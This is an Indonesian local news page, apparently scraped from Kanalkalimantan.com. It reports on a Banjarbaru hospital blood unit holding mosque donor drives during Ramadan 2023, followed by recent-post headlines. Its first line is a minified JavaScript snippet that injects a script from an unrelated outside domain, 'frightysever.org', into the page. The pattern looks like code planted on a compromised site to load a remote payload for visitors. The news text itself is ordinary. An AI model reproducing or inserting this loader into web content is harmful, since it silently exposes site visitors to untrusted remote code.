(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Penuhi Stok Darah, UTD RSD Idaman Jemput Bola Pendonor di Masjid-Masjid


KANALKALIMANTAN.COM, BANJARBARU – Dalam sebulan, rata-rata kebutuhan atau permintaan akan darah di Rumah Sakit Idaman (RSD) Banjarbaru menembus 600 kantong darah per bulan.

Jumlah stok darah di Unit Transfusi Darah (UTD) RSD Idaman Banjarbaru dipastikan mencukupi di bulan Ramadhan ini.

Namun di sisi lain, ketersediaan stok bisa saja terganggu saat puasa, mengingat berkurangnya jumlah relawan pendonor.

Untuk menyiasati stok darah di bulan Ramadhan berkurang, UTD RSD Idaman Banjarbaru melakukan jemput bola donor darah ke beberapa masjid-masjid yang melaksanakan ibadah shalat tarawih.

 

Baca juga: Perawat RSD Idaman Gagalkan Pencurian, Viral Aksi Pelaku Terekam di Sejumlah Puskesmas

Humas RSD Idaman Banjarbaru Andri memastikan, untuk stok darah di UTD RSD Idaman Banjarbaru masih mencukupi pada bulan puasa.

“Seminggu sebelum puasa sudah kita siapkan lebih banyak,” katanya, Senin (27/3/2023) siang.

Hingga hari ini, stok darah UTD RSD Idaman Banjarbaru untuk golongan darah A berjumlah 48 kantong, golongan darah B 70 kantong, golongan darah AB 8 kantong dan golongan darah O ada 57 kantong.

“Total 183 kantong, jadi masih mencukupi,” sebutnya.

Dibeberkannya, untuk kebutuhan darah di RSD Idaman Banjarbaru per hari tergantung permintaan pasien. Sedangkan untuk per bulan estimasi darah sekitar 500 – 600 kantong.

Di bulan puasa ini kata Andri pihaknya masih mengandalkan stok darah yang sudah restok sebelumnya. Disamping melakukan sosialisasi kepada masyarakat yang ingin berdonor.

Diakuinya, pada bulan puasa ini pendonor yang datang ke UTD RSD Idaman Banjarbaru sangat berkurang. Sehingga pihaknya lebih meningkatkan kegiatan jemput bola menggunakan mobil UTD RSD Idaman Banjarbaru ke masjid se Kota Banjarbaru. 

“Antisipasinya melaksanakam kegiatan safari donor ke mesjid-mesjid malam hari setelah shalat tarawih bersama PMI Banjarbaru,” ungkapnya.

Sehingga dirinya mengimbau, kepada masyarakat yang ingin melakukan donor darah dapat mendatangi beberapa masjid yang sudah dijadwalkan. (Kanalkalimantan.com/ibnu)

Reporter: ibnu
Editor: bie


Al Ghifari

Recent Posts

Ini Alasan Pemko Banjarbaru Larang Peternakan Babi Ada di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Aktivitas peternakan babi di Kota Banjarbaru kembali menjadi sorotan. Selain dikeluhkan atas… Read More

9 menit ago

Habisi Nyawa Sesama Sopir di Banjarmasin, ARM Ditangkap di Kandangan

KANALKALIMANTAN.COM.COM, BANJARMASIN - Kepolisian Reskrim Polsek Banjarmasin Barat dan tim gabungan berhasil menangkap ARM (21),… Read More

1 jam ago

Peternak Babi di Pandarapan Keberatan Batas Waktu Tiga Bulan Bongkar Kandang

KANALKALIMANTAN.COM, BANJARBARU - Puluhan peternak babi di Jalan Pandarapan RT 34 RW 5, Kelurahan Guntung… Read More

1 jam ago

Diberi Waktu Tiga Bulan, Peternakan Babi di Jalan Pandarapan Harus Dibongkar

KANALKALIMANTAN.COM, BANJARBARU – Sebanyak 21 kepala keluarga (KK) pemilik peternakan babi di Jalan Pandarapan RT… Read More

15 jam ago

Upacara Ritual Adat Mamapas Lewu di Desa Penda Ketapi

KANALKALIMANTAN.COM, KUALA KAPUAS - Warga Desa Penda Ketapi, Kecamatan Kapuas Barat, Kabupaten Kapuas, Kalteng, menggelar… Read More

15 jam ago

Penyuluhan Kesehatan Satgas TMMD di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Satgas TNI Manunggal Membangun Desa (TMMD) menggelar sosialisasi penyuluhan kesehatan masyarakat di… Read More

15 jam ago

This website uses cookies.